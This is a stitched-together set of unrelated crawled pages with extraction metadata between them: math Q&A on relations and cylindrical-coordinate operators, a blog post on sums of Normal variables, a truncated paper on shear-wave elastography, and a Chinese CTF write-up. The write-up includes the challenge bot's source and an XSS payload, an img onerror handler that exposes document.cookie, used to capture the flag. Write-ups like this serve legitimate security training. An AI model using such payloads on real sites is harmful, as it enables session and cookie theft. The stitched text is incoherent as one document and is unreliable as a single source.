@Alex Yes, there are long books written on the subject (see, eg, Gnedenko/Kolmogorov, or Feller v II, especially the section on Stable Laws). – Igor Rivin Jan 20 '11 at 3:26 | 2015-05-30 02:53:10 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.7960910201072693, "perplexity": 504.57156607317677}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": false}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2015-22/segments/1432207930866.66/warc/CC-MAIN-20150521113210-00190-ip-10-180-206-219.ec2.internal.warc.gz"} |
http://clay6.com/qa/6380/determine-whether-relation-r-is-reflexive-symmetric-and-transitive-relation | Browse Questions
# Determine whether Relation $R$ is reflexive, symmetric and transitive: Relation $R$ in the set $A$ of all human beings in a town at a particular time given by $R=\{(x,y):\; x$ is exactly $7\;cm$ taller than $y\}$
Toolbox:
• A relation R in a set A is called reflexive. if $(a,a) \in R\;$ for every$\;a \in A$
• A relation R in a set A is called symmetric. if $(a_1,a_2) \in R\;=>\; (a_2,a_1)\in R \; for \;a_1,a_2 \in A$
• A relation R in a set A is called transitive. if $(a_1,a_2) \in\;and\; R(a_2,a_3)=>that \;(a_1,a_3)\in R for\; all\; a_1,a_2,a_3 \in A$
Given set $A$ of all human beings in a town at a particular time and $R=\{(x,y):\; \text{x is exactly 7cm taller than y}\}$
If $x$ is exactly 7cm taller than $y$, $\rightarrow$ obviously $(x,x) \not \in R$, as $x$ cannot be 7cm taller han $x$.Hence $R$ is not reflexive.
If $x$ is exactly 7cm taller than $y$, $y$ obviously cannot be exactly 7cm taller than $x\; \rightarrow (x,y) \in R$, but $(y,x) \not \in R$. Therefore $R$ is not symmetric.
If $x$ is exactly 7cm taller than $y$, and $y$ is exactly 7cm taller than $z \; \rightarrow$ $x$ is obviously exactly 7+7 = 14cm taller than $z$ and not exactly 7cm taller than $z$.
Therefore, $(x,y) \in R, (y,z) \in R$ but $(x,z) \not \in R$. Hence $R$ is not transitive. | 2016-12-06 16:08:49 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 2, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9479169845581055, "perplexity": 388.0785846644047}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2016-50/segments/1480698541910.39/warc/CC-MAIN-20161202170901-00315-ip-10-31-129-80.ec2.internal.warc.gz"} |
https://math.stackexchange.com/questions/1836858/how-is-expressing-a-differential-operator-in-cylindrical-coordinates-rigorou | # How is “expressing” a differential operator “in cylindrical coordinates” rigorously defined?
I'm a mathematician (with little knowledge of differential geometry) trying to study physics. One of the greatest problems is the language regarding coordinate transformations. I tend to think of such transformations as functions (diffeomorphisms), whereas physicists just rename the arguments, e.g. $f(x,y,z)=f(\rho,\varphi,z)$.
I've gotten used to that and for some things (e.g. integration) it works just fine. But I can't get my head around the transformation (?) of differential operators. For example:
Let $f:\mathbb{R}^3\backslash\big(\{0\}\times\{0\}\times\mathbb{R}\big)\rightarrow\mathbb{R}$ be smooth. I have before me the statement that "in cyclindrical coordinates" $$\nabla f=\vec{\mathbf{e}}_\rho\frac{\partial f}{\partial\rho}+\vec{\mathbf{e}}_\varphi\frac{1}{\rho}\frac{\partial f}{\partial\varphi}+\vec{\mathbf{e}}_z\frac{\partial f}{\partial z}.$$
Now you probably consider me a pedant, but I can only try to understand that by introducing the mapping $\theta:]0,\infty[\times\mathbb{R}\times\mathbb{R}\rightarrow\mathbb{R}^3$, $$\theta(\rho,\varphi,z)=(\rho\cos\varphi,\rho\sin\varphi,z).$$
My understanding is that the above equation is actually $$\nabla(f\circ\theta)=\vec{\mathbf{e}}_\rho\partial_1(f\circ\theta)+\vec{\mathbf{e}}_\varphi\frac{1}{\rho}\partial_2(f\circ\theta)+\vec{\mathbf{e}}_z\partial_3(f\circ\theta).$$ Or is it $\left(\nabla f\right)\circ\theta$ instead of $\nabla(f\circ\theta)$?
And what are these vectors $\vec{\mathbf{e}}_\rho,\vec{\mathbf{e}}_\varphi,\vec{\mathbf{e}}_z$? I read that $\vec{\mathbf{e}}_\varphi$ is the "unit vector in $\varphi$-direction". But what does that even mean? How can one express these "unit vectors" using $\theta$?
There is a lot in the literature about how to derive such equations, but I can't really use it because I don't understand the meaning behind the symbols and I don't really understand the point of it all.
• Well, for example, $\vec{e}_\rho = \vec{e}_x \rho \cos \varphi + \vec{e}_y \rho \sin \varphi$. (Yes, that means there is an implicit dependence on $\rho$ and $\varphi$.) – Zhen Lin Jun 23 '16 at 11:59
(If you can find a library copy, Jan J. Koenderink's Solid Shape is a highly worthwhile if somewhat idiosyncratic read, a profoundly geometric introduction to differential geometry geared toward engineers and physicists, in the aesthetic spirit of Hilbert and Cohn-Vossen.)
If $x = (x_{1}, \dots, x_{n})$ is a coordinate system (which formally should be viewed as Cartesian, since "differential calculus looks the same in arbitrary coordinates"), the standard basis vector fields are viewed as partial differentiation operators, $$\Basis_{j} \leftrightarrow \frac{\dd}{\dd x_{j}},$$ via their action as directional derivatives on functions: $$\Basis_{j}(x) f = \lim_{t \to 0} \frac{f(x + t\Basis_{j}) - f(x)}{t} = \frac{\dd f}{\dd x_{j}}(x) = \frac{\dd}{\dd x_{j}}(x) f.$$
Briefly, the issues in your question boil down to the chain rule, which enters as soon as you "compare" derivatives with respect to two different coordinate systems.
If $\theta:\Reals^{n} \to \Reals^{n}$ is a continuously-differentiable change of coordinates, and if we write $y = \theta(x)$, then in "classical" notation, $$\frac{\dd}{\dd x_{j}} = \frac{\dd y_{1}}{\dd x_{j}}\, \frac{\dd}{\dd y_{1}} + \dots + \frac{\dd y_{n}}{\dd x_{j}}\, \frac{\dd}{\dd y_{n}}. \tag{1}$$
Particularly, if $$(x, y, z) = \theta(\rho, \varphi, z) = (\rho\cos\varphi, \rho\sin\varphi, z),$$ then (pardon the use of $z$ in two conceptually-distinct but logically-identical (!) roles) \begin{alignat*}{3} \Basis_{\rho} &:= \frac{\dd}{\dd\rho} &&= \frac{\dd x}{\dd\rho}\, \frac{\dd}{\dd x} + \frac{\dd y}{\dd\rho}\, \frac{\dd}{\dd y} + \frac{\dd z}{\dd\rho}\, \frac{\dd}{\dd z} &&= \cos\varphi\, \Basis_{1} + \sin\varphi\, \Basis_{2}; \\ \Basis_{\varphi} &:= \frac{\dd}{\dd\varphi} &&= \frac{\dd x}{\dd\varphi}\, \frac{\dd}{\dd x} + \frac{\dd y}{\dd\varphi}\, \frac{\dd}{\dd y} + \frac{\dd z}{\dd\varphi}\, \frac{\dd}{\dd z} &&= -\rho\sin\varphi\, \Basis_{1} + \rho\cos\varphi\, \Basis_{2}; \\ \Basis_{z} &:= \frac{\dd}{\dd z} &&= \frac{\dd x}{\dd z}\, \frac{\dd}{\dd x} + \frac{\dd y}{\dd z}\, \frac{\dd}{\dd y} + \frac{\dd z}{\dd z}\, \frac{\dd}{\dd z} &&= \Basis_{3}. \end{alignat*} To express the Cartesian frame $(\Basis_{1}, \Basis_{2}, \Basis_{3})$ in terms of the cylindrical frame $(\Basis_{\rho}, \Basis_{\varphi}, \Basis_{z})$ , one either inverts the preceding system with linear algebra, or else (locally) inverts the change of coordinates $\theta$ itself, and computes the corresponding partial derivatives for (1). (The results agree by the chain rule.)
The "modern" viewpoint is that each coordinate domain ($U$ and $V$, say) is a smooth ($3$-)manifold, and each coordinate system defines a trivialization of the respective tangent bundle via its coordinate vectors. The coordinate change $\theta:U \to V$ induces an isomorphism $\theta_{*}:TU \to TV$, defined by $$\theta_{*}(x, v) = \bigl(\theta(x), D\theta(x)(v)\bigr).$$ Consequently, there are two frames for $TV$: The "native" coordinate frame in $V$ (the $\dd/\dd y_{i}$ in (1)), and the "transplanted" image of the coordinate frame from $U$ (the $\dd/\dd x_{j}$ in (1), which properly speaking are $\theta_{*}\dd/\dd x_{j}$). The chain rule expresses the latter as linear combinations of the former.
If your primary interest is computation, it's best to get comfortable with the classical (abuses of) notation. :) | 2019-07-20 21:53:07 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.951128363609314, "perplexity": 900.5169889141962}, "config": {"markdown_headings": true, "markdown_code": false, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-30/segments/1563195526714.15/warc/CC-MAIN-20190720214645-20190721000645-00031.warc.gz"} |
https://yanhuijessica.github.io/Chictf-Writeups/web/calculus_calc_exercise/ | 2022 | 中国科学技术大学第九届信息安全大赛 | Web
# 微积分计算小练习
## 题目¶
bot.py
# Copyright 2022 USTC-Hackergame
#
# Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from selenium import webdriver
import selenium
import sys
import time
import urllib.parse
import os
# secret.py will NOT be revealed to players
from secret import FLAG, BOT_SECRET
url = input('> ')
# URL replacement
# In our environment bot access http://web
# If you need to test it yourself locally you should adjust LOGIN_URL and remove the URL replacement source code
parsed = urllib.parse.urlparse(url)
parsed = parsed._replace(netloc="web", scheme="http")
url = urllib.parse.urlunparse(parsed)
try:
options = webdriver.ChromeOptions()
options.add_argument('--no-sandbox') # sandbox not working in docker
os.environ['TMPDIR'] = "/dev/shm/"
with webdriver.Chrome(options=options) as driver:
ua = driver.execute_script('return navigator.userAgent')
print(' I am using', ua)
time.sleep(4)
print(' Putting secret flag...')
time.sleep(1)
print('- Now browsing your quiz result...')
driver.get(url)
time.sleep(4)
try:
greeting = driver.execute_script(f"return document.querySelector('#greeting').textContent")
score = driver.execute_script(f"return document.querySelector('#score').textContent")
except selenium.common.exceptions.JavascriptException:
print('JavaScript Error: Did you give me correct URL?')
exit(1)
print("OK. Now I know that:")
print(greeting)
print(score)
print('- Thank you for joining my quiz!')
except Exception as e:
print('ERROR', type(e))
import traceback
traceback.print_exception(*sys.exc_info(), limit=0, file=None, chain=False)
## 解题思路¶
• 练习网站可以输入姓名和各题的答案
• 提交后跳转到成绩页面,输入姓名中的 HTML 标签并没有被过滤
• 第一反应是反射型 XSS,本地试了也能获取到请求,但一直获取不到 bot 的请求,才又重新看了 bot.py,发现 bot 请求的是 http://web,无法访问外部网络,结合输入姓名回显,实际上应该是 DOM 型 XSS
• 直接使用 <script> 无法执行脚本,通过以下 payload 获取 Flag
<p id='cookie'></p><img src=x onerror="javascript: document.getElementById('cookie').innerHTML = document.cookie;">
### Flag¶
flag{xS5_1OI_is_N0t_SOHARD}
Contributors: YanhuiJessica
Pageviews: | 2023-03-21 05:10:30 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.2132655531167984, "perplexity": 537.890480353346}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296943625.81/warc/CC-MAIN-20230321033306-20230321063306-00231.warc.gz"} |
https://statr.me/2012/09/is-normal-normal/ | The rumor says that Normal distribution is everything.
It will take a long long time to talk about the Normal distribution thoroughly. However, today I will focus on a (seemingly) simple question, as is stated below:
If $X$ and $Y$ are univariate Normal random variables, will $X+Y$ also be Normal?
What’s your reaction towards this question? Well, at least for me, when I saw it I said “Oh, it’s stupid. Absolutely it is Normal. And what’s more, any linear combination of Normal random variables should be Normal.”
Then I’m wrong, and that’s why I want to write this blog.
A counter-example is given by the book Statistical Inference (George Casella and Roger L. Berger, 2nd Edition), in Excercise 4.47:
Let $X$ and $Y$ be independent $N(0,1)$ random variables, and define a new random variable $Z$ by
$$Z = \begin{cases} X &\text{if } XY > 0 \\ -X & \text{otherwise} \end{cases}$$
Then it can be shown that $Z$ has a normal distribution, while $Y+Z$ is not.
Here I will not put any analytical proof, but use some descriptive graphs to show this. Below is the R code to do the simulation.
set.seed(123);
x = rnorm(2000);
y = rnorm(2000);
z = ifelse(x * y > 0, x, -x);
par(mfrow = c(2, 1));
hist(y);
hist(z);
x11();
hist(y + z);
We obtain the random numbers of $X,Y$ and $Z$, and then use histograms to show their distributions.
The result is clear: Both $Y$ and $Z$ should be Normal, but $Y+Z$ has a two-mode distribution, which is obviously non-Normal.
So what’s wrong? It is not uncommon that we hear from somewhere, that linear combinations of Normal r.v.’s are also Normal, but we often omit an important condition: their joint distribution must be multivariate Normal. The formal proposition is stated below:
If $X$ follows a multivariate Normal distribution, then any linear combination of the elements of $X$ also follows a Normal distribution.
In our example, we can prove that the joint distribution of $(Y,Z)$ is not bivariate Normal, although the marginal distributions are Normal indeed.
Then you may wonder how to construct more examples like this, that is, $Y,Z$ are both $N(0,1)$ random variabels, but $(Y,Z)$ is not a bivariate Normal. This is an interesting question, and in fact, it’s much related to the Copula model. Here I only give some specific examples, while the details about Copula model may be provided in future posts.
Consider functions
$$C_1(u,v)=[\max(u^{-2}+v^{-2}-1,0)]^{-1 / 2}$$
$$C_2(u,v)=\exp(-[(\ln u)^2+(\ln v)^2]^{1 / 2})$$
$$C_3(u,v)=-\ln\left(1+\frac{(e^{-u}-1)(e^{-v}-1)}{e^{-1}-1}\right)$$
and use $\Phi(y)$ to denote the c.d.f. of $N(0,1)$ distribution, then $C_1(\Phi(y),\Phi(z))$, $C_2(\Phi(y),\Phi(z))$ and $C_3(\Phi(y),\Phi(z))$ are all joint distribution functions that satisfy 1) not bivariate Normal and 2) marginal distributions are $N(0,1)$.
Seems good, right? | 2019-04-25 15:45:53 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.823372483253479, "perplexity": 269.97415722097134}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-18/segments/1555578727587.83/warc/CC-MAIN-20190425154024-20190425180024-00120.warc.gz"} |
https://solarenergyengineering.asmedigitalcollection.asme.org/biomechanical/article/142/5/051010/958441/Shear-Wave-Propagation-and-Estimation-of-Material?searchresult=1 | ## Abstract
This paper describes the propagation of shear waves in a Holzapfel–Gasser–Ogden (HGO) material and investigates the potential of magnetic resonance elastography (MRE) for estimating parameters of the HGO material model from experimental data. In most MRE studies the behavior of the material is assumed to be governed by linear, isotropic elasticity or viscoelasticity. In contrast, biological tissue is often nonlinear and anisotropic with a fibrous structure. In such materials, application of a quasi-static deformation (predeformation) plays an important role in shear wave propagation. Closed form expressions for shear wave speeds in an HGO material with a single family of fibers were found in a reference (undeformed) configuration and after imposed predeformations. These analytical expressions show that shear wave speeds are affected by the parameters ($μ0, k1, k2, κ$) of the HGO model and by the direction and amplitude of the predeformations. Simulations of corresponding finite element (FE) models confirm the predicted influence of HGO model parameters on speeds of shear waves with specific polarization and propagation directions. Importantly, the dependence of wave speeds on the parameters of the HGO model and imposed deformations could ultimately allow the noninvasive estimation of material parameters in vivo from experimental shear wave image data.
## 1 Introduction
Elastographic techniques, including both ultrasound elastography and magnetic resonance elastography (MRE) have great potential for noninvasive evaluation of the mechanics of soft tissues. Harmonic MRE is based on MR (magnetic resonance) imaging of shear waves induced by external vibration of the tissue, followed by inversion of the displacement fields to estimate material parameters. MRE has been used to quantify noninvasively the material properties of many biological tissues, such as skeletal muscle [1], liver [2,3], and brain [4]. Most MRE studies use linear elastic or viscoelastic material models, and typically the material is assumed to be isotropic. Recently, MRE has been extended to use anisotropic material models, such as a three-parameter model [57] for nearly incompressible, transversely isotropic (TI), fibrous materials. However, these models still rely on the assumptions of linear elasticity, while many biological tissues exhibit nonlinear strain–stress relationships [8].
Nonlinear hyperelastic models have been successfully applied to describe the mechanics of soft biological materials [9,10]. The Holzapfel–Gasser–Ogden (HGO) model in particular is straightforward and widely used to model fibrous soft tissues [11,12]; it contains separate terms to describe the contributions of fiber deformation to the strain energy, and can model an isotropic nonlinear material (with $κ$ = 1/3), or a strongly anisotropic material with single or multiple “families” of fibers. Estimating the parameters of hyperelastic models from experimental data remains an important challenge. Here, we demonstrate that wave speed data, such as those available from MRE studies, can be used for this purpose.
Shear waves in MRE consist of infinitesimal dynamic deformations, which may be superimposed on larger, quasi-static “predeformations.” Shear wave speeds in a nonlinear material are determined by both its mechanical properties and its deformation state. In this study, closed-form expressions for shear wave speeds in the HGO model are obtained in terms of the model parameters and imposed predeformations. Analytical expressions for wave speeds were confirmed by performing finite element (FE) simulations of shear waves in a predeformed cube of HGO material with a single fiber family. Local frequency estimation (LFE) was used to estimate speeds of shear waves with various polarization and propagation directions from simulated displacement fields. Finally, we demonstrate, using simulated data, the feasibility of estimating the material parameters of the HGO model from shear wave speeds.
## 2 Theoretical Methods
### 2.1 Wave Speeds in Transversely Isotropic Elastic Materials.
Shear wave speeds in an elastic material are calculated from the eigenvalues of the acoustic tensor [13,14], as in the following equation:
$ρc2m=Qn·m$
(1)
where $ρc2$ is the eigenvalue of the acoustic tensor $Q$, $ρ$ is the density of material, $c$ is the shear wave speed, $n$ is the propagation direction of wave, and $m$ is the polarization direction vector of the shear wave. The acoustic tensor $Q$ for a specific propagation direction, $n$, is obtained from Eq. (2) [13,14] below:
$Q=n·A·n$
(2)
where $A$ is a fourth-order elasticity tensor which relates the incremental strain tensor, $ε̃$, and incremental stress tensor, $σ̃$. In Cartesian coordinates, this relationship can be expressed in indicial notation, $σ̃pi=Apiqjε̃qj$. For nonlinear models, such as the HGO model, the components of the elasticity tensor can be obtained from the relationship $Apiqj=FpαFqβ((∂2W)/(∂Fiα∂Fjβ))$, where $F$ is the deformation gradient tensor which accounts for the effects of predeformation [13,14], and $W$ is the strain energy function. Thus, in principle, shear wave speeds can be used to estimate material parameters.
Since the acoustic tensor, $Q$, depends on the propagation direction, $n$, in general wave speeds depend on $n$. Also, $Q$, may have up to three distinct eigenvalues (wave speeds) and three corresponding eigenvectors (polarization directions) so that there may be three plane waves that propagate in the same direction. However, material symmetries and constraints reduce the number of possible wave speeds. In an isotropic linear elastic material with shear modulus, $μ$ and bulk modulus, $K$, the acoustic tensor is the same for all propagation directions, and only two wave speeds exist: one longitudinal and one transverse (shear). Longitudinal waves in isotropic materials have $c2=(K+4μ/3)/ρ$ [15], and polarization parallel to the propagation direction ($m=n$); corresponding shear waves have $c2=μ/ρ$ and polarization $m⊥n$. In an isotropic, incompressible linear elastic material, the longitudinal wave speed becomes infinite, and only one parameter, $μ$, remains to estimate.
Fig. 1
Fig. 1
Close modal
A linear elastic, TI material requires five parameters to describe its constitutive behavior. These can be, for example, two tensile moduli ($E1$, $E2$), two shear moduli ($μ1$, $μ2$) and a bulk modulus ($K$). If the material is incompressible, three parameters are sufficient, for example, baseline shear modulus ($μ2)$ and two ratios: shear anisotropy $ϕTI=μ1/μ2−1$ and tensile anisotropy $ζTI=E1/E2−1$. In a linear elastic, nearly incompressible, TI material, in which anisotropy is due to a single family of aligned fibers, the shear wave speeds depends in a relatively simple fashion on the material properties and the wave propagation direction relative to the fibers [15]. Shear waves can be separated into slow and fast shear waves in different polarization directions (Fig. 1). The slow and fast shear wave polarization directions under no predeformation are defined by the following relationship:
$ms=n×a|n×a| mf=n×ms$
(3)
where $n$ is the propagation direction of the shear wave,$a$ is the fiber orientation after deformation, and $ms$ and $mf$ are the slow and fast polarization directions, respectively. The corresponding wave speeds in this linear elastic material, which depend on the angle, $θ$, between fiber and propagation directions are
$cs2=μ2ρ1+ ϕTI cos2θ; cf2=μ2ρ1+ ϕTI cos22θ+ ζTIsin22θ$
(4)
### 2.2 The Holzapfel–Gasser–Ogden Model.
The Holzapfel–Gasser–Ogden model, which is an influential recent model for fibrous soft tissues, was proposed by Holzapfel [17]. The strain energy density function is a sum of isotropic and anisotropic terms
$W=Wiso+Waniso$
(5)
The isotropic part of its strain energy density function contains both volumetric and isochoric terms
$Wiso=Wvol+WisochoricWvol=K2J−12, Wisochoric=μ2I¯1−3$
(6)
where K and μ are the bulk modulus and the isotropic shear modulus, respectively, $I¯1$ is the modified first invariant defined by $I¯1=J−2/3I1, (J=detF)$, where $I1$ is the first variant of Cauchy-Green strain tensor $C$. Many soft materials have shear moduli roughly between 102 and 105 Pa, spanning a cellular collagen and fibrin gels [1821], brain tissue [22,23], and muscle [24]. Anisotropic terms in the strain energy density function can have different forms depending on fiber arrangement
1. Single fiber-family model (TI): Terms in the strain energy density function reflecting the effects of fibers with a distribution of orientations centered on the unit vector $a0$, which is the fiber direction before predeformation:
$Waniso HGO1=k12k2expk2κI¯1+1−3κI¯4−12−1, for I¯4>1$
(7)
where $I¯4$ is the modified pseudo-variant defined by $I¯4=J−2/3I4$, $I4=a0⋅C⋅a0$ is the squared stretch in the fiber direction.
1. Multiple fiber-family model (orthotropic): Additional fiber families (with a principal direction of $a0i$, and the same properties k1, k2, and κ) can be modeled by adding contributions from $I4i=a0i⋅C⋅a0i$ to the strain energy, as
$Waniso HGON=∑ik12k2expk2E¯i2−1; E¯i=κI¯1+1−3κI¯4i−1, for I¯4i>1$
(8)
The effects of $k1$ and $k2$ on stress–strain behavior in simple shear are shown in Fig. 2. For example, for simple shear $γYZ$ in a plane containing fibers at an angle of $π/4$ ($a=(j+k)/2$), $k1$ describes the initial slope of the curve (Fig. 2(a)), $k2$ describes the nonlinearity of the curve (Fig. 2(b)).
Fig. 2
Fig. 2
Close modal
Fiber distributions corresponding to different values of $κ$ are shown in Fig. 3, and $κ$ captures the distribution of the fiber orientations, ranging from alignment in a single direction (κ = 0) to no preferred direction (κ = 1/3). When κ = 0, all fibers are assumed to be perfectly aligned, and when κ = 1/3, the material is isotropic. We note that, formally, fibers in the HGO model do not contribute to the stress or to the strain energy when they are in compression $(I4<1)$. We did not model the bilinearity between fiber tension and compression for wave propagation in the HGO model in the undeformed case (assuming that the fibers can resist an infinitesimal compressive strain in wave propagation, or equivalently, an infinitesimal tensile prestrain).
Fig. 3
Fig. 3
Close modal
### 2.3 Closed-Form Expressions for the Relationships Between Model Parameters and Wave Speeds
#### 2.3.1 Closed-Form Expressions for Speeds of Waves Superimposed on Simple Shear.
Closed-form expressions that relate wave speeds to model parameters are highly desirable. Such expressions for the HGO model were determined from analytical solution of the eigenvalue problem (Eq. (1)) for shear waves propagating in the negative Z-direction ($n=−k$, Fig. 4) in the undeformed configuration (Fig. 4(a)) and with imposed predeformations in simple shear corresponding to the configurations of Figs. 4(b) and 4(c). Symbolic solutions were obtained using Matlab Symbolic Toolbox (Mathworks, Natick, MA)
$csXZ=μρ+2k1ργXZ2M2expM2k2γXZ4$
(9)
(10)
$csYZ=μρ+2k1ργYZMγYZM+NexpγYZM+N2k2γYZ2$
(11)
$cfYZ =μρ+k1ρN2+6γYZMN+6γYZ2N2+2γYZ22γYZM+N2γYZM+N2expγYZM+N2k2γYZ2$
(12)
where $(csXZ$, $cfXZ)$ and $(csYZ$, $cfYZ )$ are the slow and fast shear wave speeds for predeformations $γXZ$ and $γYZ$, respectively. The terms $M$ and $N$ are combinations of the dispersion parameter $κ$ and the angle $ϕ$ between the fiber and the propagation direction:
(13)
Fig. 4
Fig. 4
Close modal
With no imposed predeformation ($γXZ=γYZ=0$), the speeds reduce to
$cs=c0=μρ; cf=μρ+k1N2ρ$
(14)
#### 2.3.2 Closed-Form Expressions for Speeds of Waves Superimposed on Stretching.
Expressions for the speeds of slow and fast shear waves superimposed on isochoric, static lengthening deformations (Fig. 5) were also obtained. In this situation, the maximum stretch ratio, $λ1=λ$, is used to describe the imposed deformation; other stretches are $λ2=λ3=1/λ$. Wave speeds were obtained with the help of matlab Symbolic Toolbox (Mathworks, Natick, MA)
$CfZ=λ2μρ+k1ρλλ2N2+λ2ML+2N2L2k2expk2L2λ2$
(15)
$CsZ=λ2μρ+λMLk1ρexpk2L2λ2$
(16)
where $(csZ$, $cfZ)$ are the slow and fast shear wave speeds for stretch $λ$ in Z-direction. Definitions of $M$ and $N$ are from Eq. (13). $L$ is defined in terms of $M$ and the stretch ratio $λ$
$L=λ−1M2λ2+λ+1−1$
(17)
Fig. 5
Fig. 5
Close modal
With no imposed predeformation ($λ=1$), the wave speed expressions can be simplified, as above, to
$cs=c0=μρ; cf=μρ+k1N2ρ$
(18)
which are identical to Eq. (14).
### 2.4 Computational Modeling and Simulations.
To verify the analytical results, FE simulations of shear wave propagation were performed using finite element software (comsolmultiphysics v5.3, Burlington, MA). A static predeformation step (either (i) simple shear or (ii) tension) and a frequency-domain perturbation step were performed in a cubic domain (50 $×$ 50 $×$ 50 mm3, Figs. 4 and 5). The HGO model was implemented in comsol to model the elastic behavior; an isotropic loss factor of 0.1 was used to provide a small amount of viscoelastic damping. We set the frequency of excitation equal to 200 Hz, in order to provide multiple wavelengths in the model domain. The domain was discretized into 5000 hexahedral elements. To demonstrate convergence, the results were confirmed at higher resolution. In order to compare the undeformed case to the cases with finite predeformation, we assume the fibers can resist infinitesimal compressive loads during wave motion. A periodic boundary condition was applied on the $XZ$-plane and $YZ$-plane, for fast and slow shear waves, respectively. The periodic boundary conditions eliminate boundary effects on the vertical sides of the cube, allowing for a closer comparison of the analytical and numerical results. The assigned default parameters are as follows: predeformation $γXZ=γYZ=0.2$; initial 